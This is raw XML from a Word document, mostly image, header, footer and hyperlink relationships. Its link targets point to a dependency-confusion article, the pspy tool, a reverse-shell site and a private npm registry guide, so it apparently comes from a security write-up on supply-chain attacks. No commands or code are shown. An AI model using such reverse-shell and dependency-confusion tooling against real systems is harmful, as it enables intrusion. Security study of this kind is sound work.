      <w:headerReference r:id="rId59" w:type="first"/>
      <w:headerReference r:id="rId60" w:type="even"/>
      <w:footerReference r:id="rId61" w:type="default"/>
      <w:footerReference r:id="rId62" w:type="first"/>
      <w:footerReference r:id="rId6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1">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="18"/>
    <w:bookmarkEnd w:id="1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4" name="image35.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3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A2">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A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Confusion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9.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image49.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42.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/DominicBreuker/pspy/releases" TargetMode="External"/><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45.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.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31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610" TargetMode="External"/><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hyperlink" Target="https://lp.webhacking.com.br/" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><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image" Target="media/image38.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://reverse-shell.sh/" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.bitsrc.io/how-to-set-up-a-private-npm-registry-locally-1065e6790796" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4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5.jp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49.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nQnTC+PlaxX8kF7N7hendLyxg==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmh4bzVxMng1anc2aDIOaC4xOG9kcHJnMXF4cXIyDmguN2tyaTZmdXB6b3FxMg5oLnRsdWhra3g0MGUzZjIOaC5ybnlwZnQxYTkxbDAyDmgubDB5ODlwdmJvZnJzMg5oLjZmaHczNW1seGUybDIOaC5oN2IyZHh2ZzB5a3UyDmguaXpibDVoeXRtdGNnMg5oLm84ZGMzb2Mzb2R5MTIOaC50b3R2MThianJicW4yDmguN3loYzd6djRiNWh6Mg5oLmx2d3FvbXk1dmttNjIOaC40N2ZxbnVsbHI0OGEyDmguMTc1ZjVjczk0ejBvOAByITFqUEw1Sml1Y3RfWTE1RWxyUENRZkljYkhEck1sU3N6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